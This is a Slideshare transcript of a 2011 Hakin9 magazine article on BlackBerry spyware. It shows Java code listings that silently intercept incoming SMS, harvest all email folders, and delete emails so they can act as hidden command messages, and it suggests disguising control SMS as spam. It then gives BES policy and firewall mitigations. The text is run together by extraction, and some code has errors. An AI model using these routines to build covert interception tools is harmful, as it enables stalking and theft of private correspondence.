The Backroom Message That’s Stolen Your Deal

Like this? Share it with your network

Share

The Backroom Message That’s Stolen Your Deal

  • 1,357 views
Uploaded on

Do you want to learn more about bigwig? Is someone keeping secrets from you? Need to silently record text messages, GPS locations and call info of your child or employee? Catch everybody at......

Do you want to learn more about bigwig? Is someone keeping secrets from you? Need to silently record text messages, GPS locations and call info of your child or employee? Catch everybody at whatever you like with our unique service.
http://hakin9.org/mobile-security-hakin9-042011/

More in: Technology , Business
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
1,357
On Slideshare
920
From Embeds
437
Number of Embeds
18

Actions

Shares
Downloads
6
Comments
0
Likes
0

Embeds 437

http://storify.com 197
http://www.behance.net 53
http://sto-strategy.com 49
http://yurychemerkin.wordpress.com 41
http://securitythroughobscurity.blog.com 23
http://s-t-o.squarespace.com 18
http://security-through-obscurity.blogspot.com 14
http://yurychemerkin.tumblr.com 12
http://www.tumblr.com 12
http://bitly.com 7
http://www.linkedin.com 2
http://sto-blog.tumblr.com 2
http://www.blogger.com 2
http://security-through-obscurity.blogspot.fr 1
http://security-through-obscurity.blogspot.pt 1
http://translate.googleusercontent.com 1
https://sto-strategy.squarespace.com 1
https://yurychemerkin.wordpress.com 1

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. ATTACK The Backroom Message That’s Stolen Your Deal Do you want to learn more about bigwig? Is someone keeping secrets from you? Need to silently record text messages, GPS locations and call info of your child or employee? Catch everybody at whatever you like with our unique service. What you will learn… What you should know… • Each email-message (or sms-message) as part term of busi- • Basic knowledge about BlackBerry security ness correspondence could be intercept • Message can activate spyware I t lets you to intercept SMS or Email messages via the might just be that your partner is planning a surprise Internet, catch cheating wives or cheating husbands, for you and has enlisted their help, so check the stop employee espionage, protect children, etc. number carefully, particularly if it seems familiar to Well, you’ve just read yet another advertising that you. summarized several spyware products for every mobile OS. To be beyond exception that Windows Mobile, Nothing personal... Symbian, iOS (iPhone) are the most popular with Everyone knows that reading other people’s letters consumer. All of kind has never had a distinct security or diaries, without the permission of the author isn’t policy. But the BlackBerry devices are one of world’s ethical. All personal correspondence, or even just top devices! It’s entirely explicable, though. There’s information such as SMS messages, address book, unique thing is defensible. It has a proof-of-security email, ICQ history, indeed are called for fashionable flow channel to transmit data from each to other. And word Privacy, or a Private, Data Privacy. Any attempt to up to now, there’s no successful decoder for ciphered cheat with it behind author back is a direct violation of technology. the individual privacy. These days a lot of people are in use of a mobile One day, everyone has thought about what men phone, it has made our lives easier and increased write to each other, or what was written by his friend or communication, in spite of opportunity for a cheating. colleagues. It’s no necessarily malicious intent. Do they You suppose your lover isn’t being faithful to you and have something to hide, to hatch a plot? Omnivorous you ought to grant your suspicions or allay your fears. curiosity is one of the most popular human vice helps So, the main of evidence can be new lover is linked with to fraudster to earn considerable sums of money every your partner. day. They always ready to help to get into somebody Telltale signs will be sms to the same number, late address phone book, email message or social at night or early in the morning or both, if the same networking pages for all comers. After all do you can number is appearing as a call at unsocial hours get access to cherished friend’s (lover’s, boss, foes) then you really have something to be concerned chats? about. However there can be a perfectly innocent The victim’s mobile phone is coveted human’s goal. explanation for activity like this and its worth pausing This storage place may shed light on wrapped in before jumping to conclusions. If the number that is mystery things. There’s no way to read others emails appearing is that of a family member or good friend it or sms. You can take phone and read all you interested22 04/2011
  • 2. The backroom message that’s stolen your dealin. It’s one of the easiest ways to do. By the way, you Routines behind the screen...may to provoke your victim into allowing acquainting The message (sms or email) intercept is a greatyourself with privacy data. It should be noted that lack opportunity to take control of somebody and be invisible.of knowledge is leading topics of the hour. Now the You’re able to read emails as well as make a telephoneplot thickens in call for a vote of confidence! Really, directory (subscriber’s list) through the text messages tohow long does software ask you to grant with privacy a minute. Such kind of message intercept is in demanddata? Do you trust software with yourself secrets? on the situation. Moreover, it’s a real ability to feel a spyTake some kind of program modifying sms&email likewise to obtain information that can’t be get in a legalgraphical controls, for instance. When you’re going to way. Some years ago such intercepts were a scienceinstall it you’ve been asking to set access permission fiction available for intelligence service. Up to now, you(as general permission), send&receive permission, don’t be secret serviceman; you don’t have a high leveletc. of experience. The explanation was quite simple. You There is no reason for concern in this case, right? only need to hit him with your legacy hammer. There’sYou install what you like despite expectancy of data no way of misapplication of hummer, isn’t it? You canstealing. If we take a Facebook application (or twitter hammer a nail into board, or you also can hammerapplication) then confidence level should be reduced a nail into smb head. There is nothing reprehensiblebecause such kind of apps has http/https via EDGE/ about it. The public tranquillity as protectability is wrong3G/WiFi as common channel to data transmission. side of vulnerability. And vice versa.Further to there’s ability to receive actual informationabout new friends or upload status by sms sending. Malware DesignFor some time past, internet spreads a spam with Ultimate goal is show what API-routines help us to designa proposal to use the service to read others’ posts. such malware. List of API classes is shall be import to re-Kaspersky Lab reported about one of these viruses create sms listener is presented in Listing 1.in February, 2009. Users are promised the ability to The first public class Date represents a specificread others SMS. By clicking on the junk link users instant in time, with millisecond precision.downloaded a Trojan called Trojan.Win32.Agent2.dbq(Kaspersky Lab’s Notation). Listing 1. API-routines to design malwares part “sms The next secret (cherished) zone area is a personal intercept”email storage. Email correspondence goes madnot less than others sms. Deceivers are offering java.util.Date;password email account’s breaking services. At javax.wireless.messaging.MessageConnection;first, they also ask for upfront payment via SMS and javax.wireless.messaging.Message;never break into account. There’s another kind ofdeception. Someone imparts news about security Listing 2. Retrieve the messageholes of Google email system or Yahoo email systemand offers to get the password from any mailbox. MessageConnection sms_connection = (MessageConnectioThere is a need for you to send to the referred above n)Connector.open("sms://:0"); ;email address your (!) password and answer for Message sms_message = sms_connection.receive();secret question (what’s your favourite colour?). It Date sms_date = sms_message.getTimestamp();accounts for by cheating the email system (Google, String sms_address = sms_message.getAddress();Yahoo). After all, you’ll supposedly receive a list of String sms_body = null;password to any email system. Come again! It’s easy if (m instanceof TextMessage)substitution of your account’s password for desired {password. So, there’s no fraud! Really, there are a lot TextMessage temp_text = (TextMessage)sms_message;of security holes (but it’s just a one kind of it); really, sms_body = temp_text.getPayloadText();there’s a way to steal password. Are ready to name }this hole? Nobody but you! The email address in else if (m instance of BinaryMessage)received message is just an intruder email account. {This way he gets other’s password. Also he doesn’t byte[] temp_byte = ((BinaryMessage) sms_message).want anyone to confide in. getPayloadData(); Thus, all proposals for access to others’ // convert Binary Data to Textcorrespondence have two goals. Trick the user out of sms_body = new String(temp_byte, "UTF-8");money or infect user’s computer with a virus. In this }case, the attacker could also capture the user’s ownpassword.www.hakin9.org/en 23
  • 3. ATTACK Interface Message is the base interface for derived The MessageConnection interface defines the basic interfaces that represent various types of messages. functionality for sending and receiving messages. It This interface contains the functionality common to all contains methods for sending and receiving messages. messages. We have a couple routines here. The receive() subroutine which receives a message. If there are no messages for this MessageConnection • getAddress() – Returns the address associated with waiting, this method will block until either a message this message. If this is a message to be sent, then for this Connection is received or the MessageConnection this address is the recipient’s address. If this is a is closed. message that has been received, then this address When an incoming message arrives, the notifyIncom is the sender’s address. ingMessage(MessageConnection) method is called. There’s • getTimestamp() – Returns the timestamp indicating a the same method for outcoming message notifyOut when this message has been sent. comingMessage(MessageConnection) that is called when an SMS message is sent from the device. Both of methods Listing 3. API-routines to design malwares part “email are called once for each incoming message to the intercept” MessageConnection. The second malware part is designed to catch email import net.rim.blackberry.api.mail.Address; messages. In this case, It should be used another import net.rim.blackberry.api.mail.Folder; signed routine set which is described in Listing 3. import net.rim.blackberry.api.mail.Message; import net.rim.blackberry.api.mail.Session; Folder INTEGER Constants import net.rim.blackberry.api.mail.Store; • DELETED – A Folder containing deleted messages. • DRAFT – A Folder containing draft messages. Listing 4. Retrieve a email message” • FILED – Contains items that are �led in a Folder. • INBOX – A Folder containing received messages. Session current_session = Session.getDefaultInstan • INVALID – A Folder containing items marked as invalid. • JUNK – A Folder for junk mail. ce(); • OTHER – A Folder that the user created – a personal String folders_name = null; folder. String email_from = null; • OUTBOX – A Folder containing messages in the process of String email_subject = null; being sent. String email_body = null; • SENT – A Folder containing sent messages. • UNFILED – Contains items that are not currently �led in a if (current_session != null) Folder. { Store current_storage = current_ session.getStore(); The Session class provides access to email services, Folder[] flist = current_storage.list(); storage, and transport. for (int i = 0; i < flist.length; i++) The Message class represents an email message. { A message contains a set of header fields (attributes) folders_name = folder.getFullName(); and a body (contents). Messages in a folder also have //get folders name a set of flags that describe its state within the folder. Message[] msgs = flist[i].getMessages(); Received messages are retrieved from a folder named for (int n=0; n < msgs.length; n++) INBOX (see Folder integer constants). { The Folder class represents a mailbox folder on Address from = msgs[n].getFrom(); the handheld. To retrieve a list of contained folders if (from != null) only call Folder.list(). But we don’t need anything about folder’s contants or system folder’s names, If email_from = from.getAddr(); we need to extract folder’s name it should routine’s } called by getFullName(). By the way, it’s simple to use a email_subject = msgs[n].getSubject(); cycle for (int i = 0; i < email_folder_list.length; i++) email_body = msgs[n].getBodyText(); because we’ve already got email’s folder list by calling } Folder.list(). } The Message class represents a message store and } its access protocol, for storing and retrieving messages on the handheld. To retrieve a Store instance to access message storage on this device we need to invoke Session.getStore().24 04/2011
  • 4. The backroom message that’s stolen your deal Refers to code above I notice that I rewrite 4 strings’objects: folders_name, email_from, email_subject, email_body.To data acquisition you should use the Vector object like„Vector data_acq = new Vector() from java.util.Vectorand then create a String object by Utils.makeStringFromVector converting data. By the way, you also can use aStringBuilder. Stolen messages from blackberry device Sender :: InternetSMS Body :: http://www.blackberryseeker.com/applications/download/ PDF-To-Go-V20_2.aspx Sender :: InternetSMS Body :: http://letitbit.net/download/.../Defcon14-V64-X30n-Black jacking_Owning_the_enterprise.m4v.htmlPuppet theatreProgress is interesting to watch. It is in every areaof human activity, else it vanishes from sight. The Figure 1. Application Managementcybercrime is beyond exception, too. It rapidly improveswhich is used by his own inhabitants. The malware 2.0 The most interesting subclass is Backdoor and Trojan-is a new word in the IT Security vocabulary since 2006. DDoS ”. The second subclass will be attended to articleThis term describes the new generation of malicious later on. And now we discuss a backdoor’s behavior.software because it well co-ordinated and well- Well, Backdoors are designed to give malicious usersfunctioning system. By the way, it poisons anti-viruses remote control over an infected computer. So, it’sexistence. similar to many administration systems designed and Trojans are malicious programs that perform actions distributed by software developers. These types ofwhich are not authorized by the user: they delete, block, malicious programs make it possible to do anythingmodify or copy data, and they disrupt the performance the intruder wants on the infected handheld: sendof computers or computer networks. Unlike viruses and and receive files, launch files or delete them, displayworms, the threats that fall into this category are unable messages, delete data, etc. The programs in thisto make copies of themselves or self-replicate. Trojans category are often used in order to unite a group ofare classified according to the type of action they victim computers and form a botnet or zombie network.perform on an infected computer. This subclass includes This gives malicious users centralized control over anthe following behaviors according to Kaspersky Lab: army of infected computers which can then be used for criminal purposes.• Backdoor• Exploit• Rootkit• Trojan-DDoS• Trojan-Downloader• Trojan-Proxy• Trojan-SMS• Trojan-Spy, etc Listing 5. Delete a email message” Import net.rim.blackberry.api.mail.Folder … Message[] emailMessage= emailFolder.getMessages(); for(int i=0;i<emailMessage.length;i++) { emailFolder.deleteMessage(emailMessage[i],true); } Figure 2. Set application’s permissionwww.hakin9.org/en 25
  • 5. ATTACK Unfortunately, RIM API does not allow to access already received/sent sms-messages. In spite of it, it still possible to mask our control command to the some kind of spam, e.g. +323232 User MegaFriend has sent message to you. Isn’t it a Facebook notify? It doesn’t matter much that such sms has another sender number; it’s a matter that your device have been received a control message. Mitigation BlackBerry Enterprise Server has several to mitigation. First, you can turn on confirmation of each sending message for cases that blackberry Trojan has ability to spend money and you have to pay the bill. This rule is placed in IT Policy>Common Policy Group>Confirm On Send. If you even set it into True value this rule exerts an impact only on user’s actions. In other words, any kind of program has never notified you when sends Figure 3. Firewall Management message. It also could set a trusted applications in Application Control>Message Access. One more a Most popular message’s control is sms (or mms). radical solution consist in disabling SMS and MMS SMS advantage is rapid access, steadiness, reliability on IT Policy>Device Only Items>Allow SMS and “IT assurance. In BlackBerry’s case email is a second Policy>Common>Disable MMS. The first feature may sufficient channel is capable of the same rapidly moving be set in False state, and the second may be set into events. The way how to catch sms or email messages True value. I discuss above. So, if we’re going to create powerful More powerful way is to create a trusted domain. command control system (further CC) we need know This ability provides us to fill a white list with trusted how to delete this message. Below is part of the codes senders and recipients and to filter a black list as way to delete all the email (see Listing 5). of phrases, senders, recipients. First of all, you The boolean value .deleteMessage(...,true) indicates should check and turn on your BES filter’s status: IT force deletion If the message is marked as saved. Policy>Security>Firewall Block Incoming Messages. If you’ve just caught an email message by using Here it should be checked a SMS, MMS, Enterprise FolderEvent(Folder folder, int type, Message message) Message as filtered types. Enterprise Message is with synchronized void messagesAdded(FolderEvent event) { none of than a enterprise email messages. After it, Message msg = e.getMessage(); } then you can delete it by fill a whitelist in IT Policy>Security>Firewall White List msg.deleteMessage(...). Address with e.g. *@blackberry.enterprise.com. Take Figure 4. Exception’s of black list Figure 5. Adding new exception26 04/2011
  • 6. The backroom message that’s stolen your deal On the ‘Net • http://docs.blackberry.com/en/admin/deliverables/12063/BlackBerry_Enterprise_Server-Policy_Reference_Guide-T323212-832026- 1023123101-001-5.0.1-US.pdf – BlackBerry Enterprise Server Version: 5.0. Policy Reference Guide, RIM, • http://docs.blackberry.com/en/developers/deliverables/11961/BlackBerry_Java_Application-Feature_and_Technical_Overview-- 789336-1109112514-001-5.0_Beta-US.pdf – BlackBerry Java Application. Version: 5.0. Feature and Technical Overview, RIM • http://docs.blackberry.com/en/developers/deliverables/9091/JDE_5.0_FundamentalsGuide_Beta.pdf – BlackBerry Java Application. Version: 5.0. Fundamentals Guide , RIM, • http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_ Application_Developer_Guide_Volume_1.pdf?nodeid=1106256&vernum=0 – BlackBerry Application Developer Guide Volume 1: Fundamentals (4.1), RIM, • http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_ Application_Developer_Guide_Volume_2.pdf?nodeid=1106444&vernum=0 – BlackBerry Application Developer Guide Volume 2: Advanced Topics (4.1), RIM, • http://www.blackberry.com/developers/docs/4.2api/ – RIM Device Java Library – 4.2.0 Release (Javadoc), RIM, • http://docs.blackberry.com/en/developers/deliverables/15497/BlackBerry_Smartphone_Simulator-Development_Guide--1001926- 0406042642-001-5.0-US.pdf – BlackBerry Smartphone Simulator. Version: 5.0. Development Guide, RIM, • http://docs.blackberry.com/en/developers/deliverables/1077/BlackBerry_Signing_Authority_Tool_1.0_-_Password_Based_-_ Administrator_Guide.pdf – BlackBerry Signature Tool 1.0. Developer Guide, RIMnotice of using a substitution characters like asterisk of spyware extend well beyond simple monitoring. It’s“*”. You also can add another values separated with designed to spy what you’re doing on your device.comma. First step is done, you’ve just create a trusted They collect information about Web pages you usuallydomain filled with only white addresses. visit, your Internet surfing habits and messages you The second step is filling black tags. First of all, you exchange. It also interfere with user control of theshould turn option, too. The rule IT Policy>Filter Rule> computer in other ways, such as installing additionalCondition and Action>Enabled is set into True state software and redirecting Web browser activity or theftswitches to strain your emails. The second rule IT of personal information (including financial informationPolicy>Filter Rule>Condition and Action>From gives such as credit card numbers).opportunity to vanish message from unknown senders. Then it sends without your knowledge to others.Here you can type something like stealer@gmail.com, However, to install they have to hide themselves inhacker@yahoo.com. The same rule IT Policy>Filter demo games as example. The presence of spywareRule>Condition and Action>Sent To can filter is typically hidden from the user, and can be difficultvulnerable message that can include stolen data to to detect. It’s not very common, it’s not an amount ofintruder account or non-trusted account. To control viruses, Trojans, backdoors that antiviruses can stop,transfer subjects and bodies set unallowable phrases and otherwise everybody will know it. Like many recentto following rules: IT Policy>Filter Rule>Condition and viruses, however, spyware by design spyware exploitsAction>Subject, IT Policy>Filter Rule>Condition and infected computers for commercial gain.Action>Body. After it, you have to check a last rule Even you think your information isn’t important tothat indicate way of delivering black messages. In first intruder, they can use your device resources againcase, device is receiving only headers, in second case others or steal data won’t never let you know about it.BES holding such messages don’t allow to device By the way, they foul the trail and left your device (anddownload it. you) holding the baby. If you are BIS consumer you always checkpermissions when downloading an application to grantor disallow status to email or sms. Or you can set it afteryou downloaded application in Options>Device>Applic YURY CHEMERKINation Management>Edit Permissions. To fill a white list Graduated at Russian State University for the Humanitieswith enabling a device firewall you should to follow Op (http://rggu.com/) in 2010. At present postgraduate at RSUH.tions>Security>Firewall, check desirable features and Information Security Analyst since 2009 and currently worksadd white rule. as mobile info security researcher in Moscow. E-mail: yury.chemerkin@gmail.com.Conclusion Facebook: http://www.facebook.com/people/Yury-Chemerkin/Spyware is one of the most common types of malware. 100001827345335.While the term spyware suggests software that LinkedIn: http://ru.linkedin.com/pub/yury-chemerkin/2a/434/secretly monitors the user’s computing, the functions 549www.hakin9.org/en 27